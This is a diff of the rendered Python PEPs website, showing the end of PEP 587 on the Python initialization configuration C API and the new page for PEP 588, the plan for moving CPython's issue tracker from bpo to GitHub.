    +
  • If run_filename is set and is a directory which contains a +__main__.py script, prepend run_filename to sys.path.
  • +
  • If isolated is zero:
      +
    • If run_module is set, prepend the current directory to +sys.path. Do nothing if the current directory cannot be read.
    • +
    • If run_filename is set, prepends the directory of the filename +to sys.path.
    • +
    • Otherwise, prepends an empty string to sys.path.
    • +
    +
  • +
+

If site_import is non-zero, sys.path can be modified by the +site module. If user_site_directory is non-zero and the user’s +site-package directory exists, the site module appends the user’s +site-package directory to sys.path.

+

See also Configuration Files used by the path configuration.

+
+
+

Py_BytesMain()

+

Python 3.7 provides a high-level Py_Main() function which requires +to pass command line arguments as wchar_t* strings. It is +non-trivial to use the correct encoding to decode bytes. Python has its +own set of issues with C locale coercion and UTF-8 Mode.

+

This PEP adds a new Py_BytesMain() function which takes command line +arguments as bytes:

+
int Py_BytesMain(int argc, char **argv)
+
+
+
+
+

Py_RunMain()

+

The new Py_RunMain() function executes the command +(PyConfig.run_command), the script (PyConfig.run_filename) or +the module (PyConfig.run_module) specified on the command line or in +the configuration, and then finalizes Python. It returns an exit status +that can be passed to the exit() function.

+
int Py_RunMain(void);
+
+
+

See Python Configuration for an example of customized Python always +running in isolated mode using Py_RunMain().

+
+
+

Multi-Phase Initialization Private Provisional API

+

This section is a private provisional API introducing multi-phase +initialization, the core feature of the PEP 432:

+
    +
  • “Core” initialization phase, “bare minimum Python”:
      +
    • Builtin types;
    • +
    • Builtin exceptions;
    • +
    • Builtin and frozen modules;
    • +
    • The sys module is only partially initialized +(ex: sys.path doesn’t exist yet);
    • +
    +
  • +
  • “Main” initialization phase, Python is fully initialized:
      +
    • Install and configure importlib;
    • +
    • Apply the Path Configuration;
    • +
    • Install signal handlers;
    • +
    • Finish sys module initialization (ex: create sys.stdout and +sys.path);
    • +
    • Enable optional features like faulthandler and tracemalloc;
    • +
    • Import the site module;
    • +
    • etc.
    • +
    +
  • +
+

Private provisional API:

+
    +
  • PyConfig._init_main: if set to 0, Py_InitializeFromConfig() +stops at the “Core” initialization phase.
  • +
  • PyStatus _Py_InitializeMain(void): move to the “Main” +initialization phase, finish the Python initialization.
  • +
+

No module is imported during the “Core” phase and the importlib +module is not configured: the Path Configuration is only applied +during the “Main” phase. It may allow to customize Python in Python to +override or tune the Path Configuration, maybe install a custom +sys.meta_path importer or an import hook, etc.

+

It may become possible to compute the Path Configuration in Python, +after the Core phase and before the Main phase, which is one of the PEP +432 motivation.

+

The “Core” phase is not properly defined: what should be and what should +not be available at this phase is not specified yet. The API is marked +as private and provisional: the API can be modified or even be removed +anytime until a proper public API is designed.

+

Example running Python code between “Core” and “Main” initialization +phases:

+
void init_python(void)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    config._init_main = 0;
+
+    /* ... customize 'config' configuration ... */
+
+    status = Py_InitializeFromConfig(&config);
+    PyConfig_Clear(&config);
+    if (PyStatus_Exception(status)) {
+        Py_ExitStatusException(status);
+    }
+
+    /* Use sys.stderr because sys.stdout is only created
+       by _Py_InitializeMain() */
+    int res = PyRun_SimpleString(
+        "import sys; "
+        "print('Run Python code before _Py_InitializeMain', "
+               "file=sys.stderr)");
+    if (res < 0) {
+        exit(1);
+    }
+
+    /* ... put more configuration code here ... */
+
+    status = _Py_InitializeMain();
+    if (PyStatus_Exception(status)) {
+        Py_ExitStatusException(status);
+    }
+}
+
+
+
+
+
+

Backwards Compatibility

+

This PEP only adds a new API: it leaves the existing API unchanged and +has no impact on the backwards compatibility.

+

The Python 3.7 Py_Initialize() function now disable the C locale +coercion (PEP 538) and the UTF-8 Mode (PEP 540) by default to prevent +mojibake. The new API using the Python Configuration is needed to +enable them automatically.

+
+
+

Annexes

+
+

Comparison of Python and Isolated Configurations

+

Differences between PyPreConfig_InitPythonConfig() +and PyPreConfig_InitIsolatedConfig():

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PyPreConfigPythonIsolated
coerce_c_locale_warn-10
coerce_c_locale-10
configure_locale10
dev_mode-10
isolated01
legacy_windows_fs_encoding-10
use_environment00
parse_argv10
utf8_mode-10
+

Differences between PyConfig_InitPythonConfig() +and PyConfig_InitIsolatedConfig():

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PyConfigPythonIsolated
configure_c_stdio10
install_signal_handlers10
isolated01
parse_argv10
pathconfig_warnings10
use_environment10
user_site_directory10
+
+
+

Priority and Rules

+

Priority of configuration parameters, highest to lowest:

+
    +
  • PyConfig
  • +
  • PyPreConfig
  • +
  • Configuration files
  • +
  • Command line options
  • +
  • Environment variables
  • +
  • Global configuration variables
  • +
+

Priority of warning options, highest to lowest:

+
    +
  • PyConfig.warnoptions
  • +
  • PySys_AddWarnOption()
  • +
  • PyConfig.bytes_warning (add "error::BytesWarning" filter if +greater than 1, add "default::BytesWarning filter if equals to 1)
  • +
  • -W opt command line argument
  • +
  • PYTHONWARNINGS environment variable
  • +
  • PyConfig.dev_mode (add "default" filter)
  • +
+

Rules on PyConfig parameters:

+
    +
  • If isolated is non-zero, use_environment and +user_site_directory are set to 0.
  • +
  • If dev_mode is non-zero, allocator is set to "debug", +faulthandler is set to 1, and "default" filter is added to +warnoptions. But the PYTHONMALLOC environment variable has the +priority over dev_mode to set the memory allocator.
  • +
  • If base_prefix is not set, it inherits prefix value.
  • +
  • If base_exec_prefix is not set, it inherits exec_prefix value.
  • +
  • If the python._pth configuration file is present, isolated is +set to 1 and site_import is set to 0; but site_import is set +to 1 if python._pth contains import site.
  • +
+

Rules on PyConfig and PyPreConfig parameters:

+
    +
  • If PyPreConfig.legacy_windows_fs_encoding is non-zero, +set PyPreConfig.utf8_mode to 0, set +PyConfig.filesystem_encoding to mbcs, and set +PyConfig.filesystem_errors to replace.
  • +
+
+
+

Configuration Files

+

Python configuration files used by the Path Configuration:

+
    +
  • pyvenv.cfg
  • +
  • python._pth (Windows only)
  • +
  • pybuilddir.txt (Unix only)
  • +
+
+
+

Global Configuration Variables

+

Global configuration variables mapped to PyPreConfig fields:

+ + + + + + + + + + + + + + + + + + + + +
VariableField
Py_IgnoreEnvironmentFlaguse_environment (NOT)
Py_IsolatedFlagisolated
Py_LegacyWindowsFSEncodingFlaglegacy_windows_fs_encoding
Py_UTF8Modeutf8_mode
+

(NOT) means that the PyPreConfig value is the opposite of the global +configuration variable value. Py_LegacyWindowsFSEncodingFlag is only +available on Windows.

+

Global configuration variables mapped to PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VariableField
Py_BytesWarningFlagbytes_warning
Py_DebugFlagparser_debug
Py_DontWriteBytecodeFlagwrite_bytecode (NOT)
Py_FileSystemDefaultEncodeErrorsfilesystem_errors
Py_FileSystemDefaultEncodingfilesystem_encoding
Py_FrozenFlagpathconfig_warnings (NOT)
Py_HasFileSystemDefaultEncodingfilesystem_encoding
Py_HashRandomizationFlaguse_hash_seed, hash_seed
Py_IgnoreEnvironmentFlaguse_environment (NOT)
Py_InspectFlaginspect
Py_InteractiveFlaginteractive
Py_IsolatedFlagisolated
Py_LegacyWindowsStdioFlaglegacy_windows_stdio
Py_NoSiteFlagsite_import (NOT)
Py_NoUserSiteDirectoryuser_site_directory (NOT)
Py_OptimizeFlagoptimization_level
Py_QuietFlagquiet
Py_UnbufferedStdioFlagbuffered_stdio (NOT)
Py_VerboseFlagverbose
_Py_HasFileSystemDefaultEncodeErrorsfilesystem_errors
+

(NOT) means that the PyConfig value is the opposite of the global +configuration variable value. Py_LegacyWindowsStdioFlag is only +available on Windows.

+
+
+

Command Line Arguments

+

Usage:

+
python3 [options]
+python3 [options] -c COMMAND
+python3 [options] -m MODULE
+python3 [options] SCRIPT
+
+
+

Command line options mapped to pseudo-action on PyPreConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + +
OptionPyConfig field
-Euse_environment = 0
-Iisolated = 1
-X devdev_mode = 1
-X utf8utf8_mode = 1
-X utf8=VALUEutf8_mode = VALUE
+

Command line options mapped to pseudo-action on PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OptionPyConfig field
-bbytes_warning++
-Bwrite_bytecode = 0
-c COMMANDrun_command = COMMAND
--check-hash-based-pycs=MODEcheck_hash_pycs_mode = MODE
-dparser_debug++
-Euse_environment = 0
-iinspect++ and interactive++
-Iisolated = 1
-m MODULErun_module = MODULE
-Ooptimization_level++
-qquiet++
-Ruse_hash_seed = 0
-suser_site_directory = 0
-Ssite_import
-tignored (kept for backwards compatibility)
-ubuffered_stdio = 0
-vverbose++
-W WARNINGadd WARNING to warnoptions
-xskip_source_first_line = 1
-X OPTIONadd OPTION to xoptions
+

-h, -? and -V options are handled without PyConfig.

+
+
+

-X Options

+

-X options mapped to pseudo-action on PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OptionPyConfig field
-X devdev_mode = 1
-X faulthandlerfaulthandler = 1
-X importtimeimport_time = 1
-X pycache_prefix=PREFIXpycache_prefix = PREFIX
-X showalloccountshow_alloc_count = 1
-X showrefcountshow_ref_count = 1
-X tracemalloc=Ntracemalloc = N
+
+
+

Environment Variables

+

Environment variables mapped to PyPreConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + +
VariablePyPreConfig field
PYTHONCOERCECLOCALEcoerce_c_locale, coerce_c_locale_warn
PYTHONDEVMODEdev_mode
PYTHONLEGACYWINDOWSFSENCODINGlegacy_windows_fs_encoding
PYTHONMALLOCallocator
PYTHONUTF8utf8_mode
+

Environment variables mapped to PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VariablePyConfig field
PYTHONDEBUGparser_debug
PYTHONDEVMODEdev_mode
PYTHONDONTWRITEBYTECODEwrite_bytecode
PYTHONDUMPREFSdump_refs
PYTHONEXECUTABLEprogram_name
PYTHONFAULTHANDLERfaulthandler
PYTHONHASHSEEDuse_hash_seed, hash_seed
PYTHONHOMEhome
PYTHONINSPECTinspect
PYTHONIOENCODINGstdio_encoding, stdio_errors
PYTHONLEGACYWINDOWSSTDIOlegacy_windows_stdio
PYTHONMALLOCSTATSmalloc_stats
PYTHONNOUSERSITEuser_site_directory
PYTHONOPTIMIZEoptimization_level
PYTHONPATHpythonpath_env
PYTHONPROFILEIMPORTTIMEimport_time
PYTHONPYCACHEPREFIX,pycache_prefix
PYTHONTRACEMALLOCtracemalloc
PYTHONUNBUFFEREDbuffered_stdio
PYTHONVERBOSEverbose
PYTHONWARNINGSwarnoptions
+

PYTHONLEGACYWINDOWSFSENCODING and PYTHONLEGACYWINDOWSSTDIO are +specific to Windows.

+
+
+

Default Python Configuration

+

PyPreConfig_InitPythonConfig():

+
    +
  • allocator = PYMEM_ALLOCATOR_NOT_SET
  • +
  • coerce_c_locale_warn = -1
  • +
  • coerce_c_locale = -1
  • +
  • configure_locale = 1
  • +
  • dev_mode = -1
  • +
  • isolated = 0
  • +
  • legacy_windows_fs_encoding = -1
  • +
  • use_environment = 1
  • +
  • utf8_mode = -1
  • +
+

PyConfig_InitPythonConfig():

+
    +
  • argv = []
  • +
  • base_exec_prefix = NULL
  • +
  • base_prefix = NULL
  • +
  • buffered_stdio = 1
  • +
  • bytes_warning = 0
  • +
  • check_hash_pycs_mode = NULL
  • +
  • configure_c_stdio = 1
  • +
  • dev_mode = 0
  • +
  • dump_refs = 0
  • +
  • exec_prefix = NULL
  • +
  • executable = NULL
  • +
  • faulthandler = 0
  • +
  • filesystem_encoding = NULL
  • +
  • filesystem_errors = NULL
  • +
  • hash_seed = 0
  • +
  • home = NULL
  • +
  • import_time = 0
  • +
  • inspect = 0
  • +
  • install_signal_handlers = 1
  • +
  • interactive = 0
  • +
  • isolated = 0
  • +
  • malloc_stats = 0
  • +
  • module_search_path_env = NULL
  • +
  • module_search_paths = []
  • +
  • optimization_level = 0
  • +
  • parse_argv = 1
  • +
  • parser_debug = 0
  • +
  • pathconfig_warnings = 1
  • +
  • prefix = NULL
  • +
  • program_name = NULL
  • +
  • pycache_prefix = NULL
  • +
  • quiet = 0
  • +
  • run_command = NULL
  • +
  • run_filename = NULL
  • +
  • run_module = NULL
  • +
  • show_alloc_count = 0
  • +
  • show_ref_count = 0
  • +
  • site_import = 1
  • +
  • skip_source_first_line = 0
  • +
  • stdio_encoding = NULL
  • +
  • stdio_errors = NULL
  • +
  • tracemalloc = 0
  • +
  • use_environment = 1
  • +
  • use_hash_seed = 0
  • +
  • user_site_directory = 1
  • +
  • verbose = 0
  • +
  • warnoptions = []
  • +
  • write_bytecode = 1
  • +
  • xoptions = []
  • +
  • _init_main = 1
  • +
  • _install_importlib = 1
  • +
+
+
+

Default Isolated Configuration

+

PyPreConfig_InitIsolatedConfig():

+
    +
  • allocator = PYMEM_ALLOCATOR_NOT_SET
  • +
  • coerce_c_locale_warn = 0
  • +
  • coerce_c_locale = 0
  • +
  • configure_locale = 0
  • +
  • dev_mode = 0
  • +
  • isolated = 1
  • +
  • legacy_windows_fs_encoding = 0
  • +
  • use_environment = 0
  • +
  • utf8_mode = 0
  • +
+

PyConfig_InitIsolatedConfig():

+
    +
  • argv = []
  • +
  • base_exec_prefix = NULL
  • +
  • base_prefix = NULL
  • +
  • buffered_stdio = 1
  • +
  • bytes_warning = 0
  • +
  • check_hash_pycs_mode = NULL
  • +
  • configure_c_stdio = 0
  • +
  • dev_mode = 0
  • +
  • dump_refs = 0
  • +
  • exec_prefix = NULL
  • +
  • executable = NULL
  • +
  • faulthandler = 0
  • +
  • filesystem_encoding = NULL
  • +
  • filesystem_errors = NULL
  • +
  • hash_seed = 0
  • +
  • home = NULL
  • +
  • import_time = 0
  • +
  • inspect = 0
  • +
  • install_signal_handlers = 0
  • +
  • interactive = 0
  • +
  • isolated = 1
  • +
  • malloc_stats = 0
  • +
  • module_search_path_env = NULL
  • +
  • module_search_paths = []
  • +
  • optimization_level = 0
  • +
  • parse_argv = 0
  • +
  • parser_debug = 0
  • +
  • pathconfig_warnings = 0
  • +
  • prefix = NULL
  • +
  • program_name = NULL
  • +
  • pycache_prefix = NULL
  • +
  • quiet = 0
  • +
  • run_command = NULL
  • +
  • run_filename = NULL
  • +
  • run_module = NULL
  • +
  • show_alloc_count = 0
  • +
  • show_ref_count = 0
  • +
  • site_import = 1
  • +
  • skip_source_first_line = 0
  • +
  • stdio_encoding = NULL
  • +
  • stdio_errors = NULL
  • +
  • tracemalloc = 0
  • +
  • use_environment = 0
  • +
  • use_hash_seed = 0
  • +
  • user_site_directory = 0
  • +
  • verbose = 0
  • +
  • warnoptions = []
  • +
  • write_bytecode = 1
  • +
  • xoptions = []
  • +
  • _init_main = 1
  • +
  • _install_importlib = 1
  • +
+
+
+

Python 3.7 API

+

Python 3.7 has 4 functions in its C API to initialize and finalize +Python:

+
    +
  • Py_Initialize(), Py_InitializeEx(): initialize Python
  • +
  • Py_Finalize(), Py_FinalizeEx(): finalize Python
  • +
+

Python 3.7 can be configured using Global Configuration Variables, +Environment Variables, and the following functions:

+
    +
  • PyImport_AppendInittab()
  • +
  • PyImport_ExtendInittab()
  • +
  • PyMem_SetAllocator()
  • +
  • PyMem_SetupDebugHooks()
  • +
  • PyObject_SetArenaAllocator()
  • +
  • Py_SetPath()
  • +
  • Py_SetProgramName()
  • +
  • Py_SetPythonHome()
  • +
  • Py_SetStandardStreamEncoding()
  • +
  • PySys_AddWarnOption()
  • +
  • PySys_AddXOption()
  • +
  • PySys_ResetWarnOptions()
  • +
+

There is also a high-level Py_Main() function and +PyImport_FrozenModules variable which can be overridden.

+

See Initialization, Finalization, and Threads documentation.

+
+
+
+

Python Issues

+

Issues that will be fixed by this PEP, directly or indirectly:

+
    +
  • bpo-1195571: “simple +callback system for Py_FatalError”
  • +
  • bpo-11320: +“Usage of API method Py_SetPath causes errors in Py_Initialize() +(Posix only)”
  • +
  • bpo-13533: “Would like +Py_Initialize to play friendly with host app”
  • +
  • bpo-14956: “custom PYTHONPATH +may break apps embedding Python”
  • +
  • bpo-19983: “When interrupted +during startup, Python should not call abort() but exit()”
  • +
  • bpo-22213: “Make pyvenv style +virtual environments easier to configure when embedding Python”.
  • +
  • bpo-29778: “_Py_CheckPython3 +uses uninitialized dllpath when embedder sets module path with +Py_SetPath”
  • +
  • bpo-30560: “Add +Py_SetFatalErrorAbortFunc: Allow embedding program to handle fatal +errors”.
  • +
  • bpo-31745: “Overloading +“Py_GetPath” does not work”
  • +
  • bpo-32573: “All sys attributes +(.argv, …) should exist in embedded environments”.
  • +
  • bpo-33135: “Define field +prefixes for the various config structs”. The PEP now defines well +how warnings options are handled.
  • +
  • bpo-34725: +“Py_GetProgramFullPath() odd behaviour in Windows”
  • +
  • bpo-36204: “Deprecate calling +Py_Main() after Py_Initialize()? Add Py_InitializeFromArgv()?”
  • +
+

Issues of the PEP implementation:

+
    +
  • bpo-16961: “No regression +tests for -E and individual environment vars”
  • +
  • bpo-20361: “-W command line +options and PYTHONWARNINGS environmental variable should not override +-b / -bb command line options”
  • +
  • bpo-26122: “Isolated mode +doesn’t ignore PYTHONHASHSEED”
  • +
  • bpo-29818: +“Py_SetStandardStreamEncoding leads to a memory error in debug mode”
  • +
  • bpo-31845: +“PYTHONDONTWRITEBYTECODE and PYTHONOPTIMIZE have no effect”
  • +
  • bpo-32030: “PEP 432: Rewrite +Py_Main()”
  • +
  • bpo-32124: “Document functions +safe to be called before Py_Initialize()”
  • +
  • bpo-33042: “New 3.7 startup +sequence crashes PyInstaller”
  • +
  • bpo-33932: “Calling +Py_Initialize() twice now triggers a fatal error (Python 3.7)”
  • +
  • bpo-34008: “Do we support +calling Py_Main() after Py_Initialize()?”
  • +
  • bpo-34170: “Py_Initialize(): +computing path configuration must not have side effect (PEP 432)”
  • +
  • bpo-34589: “Py_Initialize() +and Py_Main() should not enable C locale coercion”
  • +
  • bpo-34639: +“PYTHONCOERCECLOCALE is ignored when using -E or -I option”
  • +
  • bpo-36142: “Add a new +_PyPreConfig step to Python initialization to setup memory allocator +and encodings”
  • +
  • bpo-36202: “Calling +Py_DecodeLocale() before _PyPreConfig_Write() can produce mojibake”
  • +
  • bpo-36301: “Add +_Py_PreInitialize() function”
  • +
  • bpo-36443: “Disable +coerce_c_locale and utf8_mode by default in _PyPreConfig?”
  • +
  • bpo-36444: “Python +initialization: remove _PyMainInterpreterConfig”
  • +
  • bpo-36471: “PEP 432, PEP 587: +Add _Py_RunMain()”
  • +
  • bpo-36763: “PEP 587: Rework +initialization API to prepare second version of the PEP”
  • +
  • bpo-36775: “Rework filesystem +codec implementation”
  • +
  • bpo-36900: “Use _PyCoreConfig +rather than global configuration variables”
  • +
+

Issues related to this PEP:

+
    +
  • bpo-12598: “Move sys variable +initialization from import.c to sysmodule.c”
  • +
  • bpo-15577: “Real argc and argv +in embedded interpreter”
  • +
  • bpo-16202: “sys.path[0] +security issues”
  • +
  • bpo-18309: “Make python +slightly more relocatable”
  • +
  • bpo-22257: “PEP 432: Redesign +the interpreter startup sequence”
  • +
  • bpo-25631: “Segmentation fault +with invalid Unicode command-line arguments in embedded Python”
  • +
  • bpo-26007: “Support embedding +the standard library in an executable”
  • +
  • bpo-31210: “Can not import +modules if sys.prefix contains DELIM”.
  • +
  • bpo-31349: “Embedded +initialization ignores Py_SetProgramName()”
  • +
  • bpo-33919: “Expose +_PyCoreConfig structure to Python”
  • +
  • bpo-35173: “Re-use already +existing functionality to allow Python 2.7.x (both embedded and +standalone) to locate the module path according to the shared library”
  • +
+
+
+

Discussions

+ +
+
+

Version History

+
    +
  • Version 5:
      +
    • Rename PyInitError to PyStatus
    • +
    • Rename PyInitError_Failed() to PyStatus_Exception()
    • +
    • Rename Py_ExitInitError() to Py_ExitStatusException()
    • +
    • Add PyPreConfig._config_init private field.
    • +
    • Fix Python Configuration default values: isolated=0 +and use_environment=1, instead of -1.
    • +
    • Add “Multi-Phase Initialization Private Provisional API” +and “Discussions” sections
    • +
    +
  • +
  • Version 4:
      +
    • Introduce “Python Configuration” and “Isolated Configuration” which +are well better defined. Replace all macros with functions.
    • +
    • Replace PyPreConfig_INIT and PyConfig_INIT macros with +functions:
        +
      • PyPreConfig_InitIsolatedConfig(), PyConfig_InitIsolatedConfig()
      • +
      • PyPreConfig_InitPythonConfig(), PyConfig_InitPythonConfig()
      • +
      +
    • +
    • PyPreConfig no longer uses dynamic memory, the allocator +field type becomes an int, add configure_locale and +parse_argv field.
    • +
    • PyConfig: rename module_search_path_env to +pythonpath_env, rename use_module_search_paths to +module_search_paths_set, remove program and dll_path.
    • +
    • Replace Py_INIT_xxx() macros with PyInitError_xxx() +functions.
    • +
    • Remove the “Constant PyConfig” section. Remove +Py_InitializeFromArgs() and Py_InitializeFromBytesArgs() +functions.
    • +
    +
  • +
  • Version 3:
      +
    • PyConfig: Add configure_c_stdio and parse_argv; +rename _frozen to pathconfig_warnings.
    • +
    • Rename functions using bytes strings and wide character strings. For +example, Py_PreInitializeFromWideArgs() becomes +Py_PreInitializeFromArgs(), and PyConfig_SetArgv() becomes +PyConfig_SetBytesArgv().
    • +
    • Add PyWideStringList_Insert() function.
    • +
    • New “Path configuration”, “Isolate Python”, “Python Issues” +and “Version History” sections.
    • +
    • PyConfig_SetString() and PyConfig_SetBytesString() now +requires the configuration as the first argument.
    • +
    • Rename Py_UnixMain() to Py_BytesMain()
    • +
    +
  • +
  • Version 2: Add PyConfig methods (ex: PyConfig_Read()), add +PyWideStringList_Append(), rename PyWideCharList to +PyWideStringList.
  • +
  • Version 1: Initial version.
  • +
+
+
+

Acceptance

+

PEP 587 was accepted by Thomas Wouters on May 26, 2019.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0587.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0588/index.html b/pep-0588/index.html new file mode 100644 index 00000000000..6a7c584b512 --- /dev/null +++ b/pep-0588/index.html @@ -0,0 +1,428 @@ + + + + + + + + PEP 588 – GitHub Issues Migration Plan | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 588 – GitHub Issues Migration Plan

+
+
Author:
+
Mariatta <mariatta at python.org>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
27-Mar-2019
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at psf/gh-migration#13.

+

×

+

The migration was carried out in April 2022.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP describes the detailed plan for migrating from Python’s issue +tracker on Roundup to GitHub issues. See PEP 581 for rationale and +background. PEP 588 also describes the detailed timeline for the +migration.

+
+
+

Migration Plan

+

Here we outline the tasks, steps, and core decisions we need to make +in order to migrate bug tracking to GitHub, with the least impact on +CPython developer productivity.

+
+

Hire a professional project manager

+

Having a professional project manager to handle the migration, similar to how +the Warehouse project was managed, would help ensure the success of this project.

+
+
+

Create a playground CPython issue tracker on GitHub

+

We should create a playground issue tracker on GitHub where we can experiment +and test out the new workflow.

+
+
+

Backup of GitHub data

+

This effort has been started and is being tracked as an issue in +core-workflow [1]. We’re using GitHub’s Migrations API [2] to +download GitHub data for CPython on a daily basis. The archives will +be dropped in a S3 bucket.

+

Thanks to Ee Durbin for working on this.

+
+
+

Update the CLA host

+

At the moment, the CLA is hosted within bpo. It needs to be updated such that +signing the CLA does not require a bpo account, and it should be hosted outside +of the bpo.

+

The current CLA process itself is not ideal. Currently, contributors to +devguide, peps, and core-workflow need to sign a CLA, and it requires a bpo +account. A bpo account should not be required for those projects.

+

There is an ongoing effort to start using our own instance of CLA +assistant instead of the current CLA process in place. Discussion +about this has been started in core-workflow mailing list +as well as on Discourse.

+

This effort is currently stalled +because cla-assistant does not yet support CLA signed on behalf of organization.

+
+
+

Create “Python Triage” team on GitHub

+

The bug triagers on bpo are valuable to the core Python workflow, and we +definitely would need even more help with triaging issues on GitHub.

+

It has been proposed on Discourse +for us to create a “bug triage” team on GitHub to help with closing +issues, notifying the appropriate parties, as well as applying labels +to issues and pull requests.

+

The new Triage role on GitHub is currently in beta, and the Python organization +has been granted access to this role, and we can begin taking advantage of it.

+

The “Python Triage” team has been created. A description and expectations of the +triage role have been added to Devguide.

+

Progress of this project can be +tracked in “Adding Triagers” project board.

+
+
+

Create labels for issue triage

+

In bpo, we currently have the following fields for each issue:

+

Types: behavior, crash, compile error, resource +usage, security, performance, enhancement.

+

Components: 2to3, Argument Clinic, asyncio, Build, +Cross-build, ctypes, …

+

Priority: release blocker, deferred blocker, critical, +high, normal, low

+

We will create the corresponding labels:

+
type-behavior, type-crash, type-compile error, type-resource usage, ...
+
+components-2to3, components-argument clinic, components-asyncio, ...
+
+priority-release blocker, priority-deferred blocker, priority-critical, ...
+
+
+

In addition, we’ll create a needs triage label.

+

The final “labels” to be created can be decided at a later time when +it is time to start switching to GitHub issues.

+

A test repository containing all possible labels and color schema has been +created by Carol Willing and can be reviewed at https://github.com/willingc/test-581/labels.

+
+
+

Create issue templates

+

We will create an issue template and add the following headers:

+
---
+Type: behavior | crash | compile error | resource usage (choose one)
+Components: 2to3 | Argument Clinic | asyncio | Build | ... (can select more than one)
+Priority: release blocker | deferred blocker | critical | ...
+Needs backport to: 2.7 | 3.6 | 3.7
+---
+
+
+

The idea is to allow the issue creator to help us triage the issue. +The above values are pre-filled in the template. The issue creator will remove +texts that do not apply to their issue.

+

Based on the above headers, bedevere-bot can apply the necessary +labels to the issue. If the issue creator did not supply the above +headers, the bot will apply the needs triage label. At that point, +it will require a core developer to properly label the issue.

+

We can also take advantage of GitHub’s multiple issue template +feature, and the ability to automatically set issue assignee and +labels by using issue templates.

+
+
+

Updates to bedevere

+

Bedevere-bot will need to be updated to recognize the issue headers described +above and apply the proper labels.

+

Bedevere-bot can also copy over the labels to pull requests that correspond to +the issue.

+
+
+

Update the devguide

+

Devguide should be updated with information about the new workflow of using GitHub +issues. It can be done as a separate branch, and it should be done ahead of the +migration, not after.

+
+
+

Add a button in bpo to migrate the issue to GitHub

+

This will require the bpo to be updated. But I believe the effort needed for +this is much less than a complete overhaul.

+

We will create a button in bpo, that will copy over the issue description +and associated comments into a GitHub issue.

+

We need to add a new status: “moved” with the url of the GitHub issue.

+

We should not be moving all open issues to GitHub. Only when someone +is interested in continuing work or discussion about the issue, that +the issue should be “moved” to GitHub.

+
+
+

Migrated issues

+

When an issue is marked as “moved”, this issue should be in read-only mode. bpo +should forbid the edition of the issue.

+
+
+

Make bpo read-only

+

This should be the final step. Once we start using GitHub issues, make bpo +read-only, instead of shutting it down. +Do not accept new registrations. Do not allow comments or issues to be created.

+
+
+

Mapping between issues from bpo and GitHub

+

Usually when we reference an issue from bpo, we use bpo-XYZ but with +GitHub, we will have a new reference with this format +https://github.com/python/cpython/issue/XYZ.

+

Because we will migrate the issues from bpo to GitHub, we need to have a new +field on bpo for the reference to the issues on GitHub, and the same thing on +GitHub for the ‘eventual’ reference from bpo.

+

For GitHub, we need to add origin: https://bugs.python.org/issueXYZ. +For bpo, add a new field moved to: +https://github.com/python/cpython/issue/XYZ.

+
+
+

Nosy-ing the expert

+

A current functionality in bpo is to automatically nosy people who are listed +as an expert of certain area. Several Python core developers have expressed that +they prefer not having to subscribe to everything on GitHub, but only getting notified +for issues related to their area of interest and expertise.

+

To help with this situation, we can develop a bot that can notify people +whenever an issue has been categorized using labels. For example, when an issue +was labeled with area-windows, the windows experts can be notified. +The notification can be in the form of email notification, or @-mention on GitHub.

+
+
+
+

Open issues

+
+

A GitHub account should not be a requirement

+

Back when moving the CPython codebase from Mercurial to GitHub was +being discussed [3] [4], it was brought up that we still needed to +allow uploading of patches on bpo, and that a GitHub account should +not be a requirement in order to contribute to Python.

+

If bpo is made read-only, we’ll need to come up with a different solution to +allow people to contribute when they don’t have a GitHub account.

+

One solution is to create a new “python-issues” mailing list, similar to the +docs@python.org [5] mailing list, to allow people to submit their issues +there.

+

Related to this, since the migration to GitHub in 2017, I recall one +case [6] where there was a contributor, who submitted a patch to +Mercurial and refused to create a GitHub account. Because of this, our +bot was unable to detect whether they had signed the CLA. Another +person had volunteered to upload their patch to GitHub. But it was +still required that both people sign the CLA.

+

That particular situation was complicated. It took up five core +developers’ time to investigate and manually check the CLA, causing +confusion.

+
+
+

Trim off the “Components” list

+

Is the current “components” list still making sense and relevant? +Can the list be shortened?

+
+
+

Priority list

+

Is the current “priority” list useful? Alyssa Coghlan noted that perhaps only +release blocker and deferred blocker are useful.

+
+
+
+

Further questions and discussions

+

You can post questions on Discourse under the +Core-Workflow category.

+
+
+

Acknowledgements

+

Thanks to Guido van Rossum, Brett Cannon, and Alyssa Coghlan, who were consulted +in the early stage and research of this PEP. Their feedback, concerns, input, +and ideas have been valuable.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0588.rst

+

Last modified: 2024-10-28 18:53:21 GMT

+ +
+ +
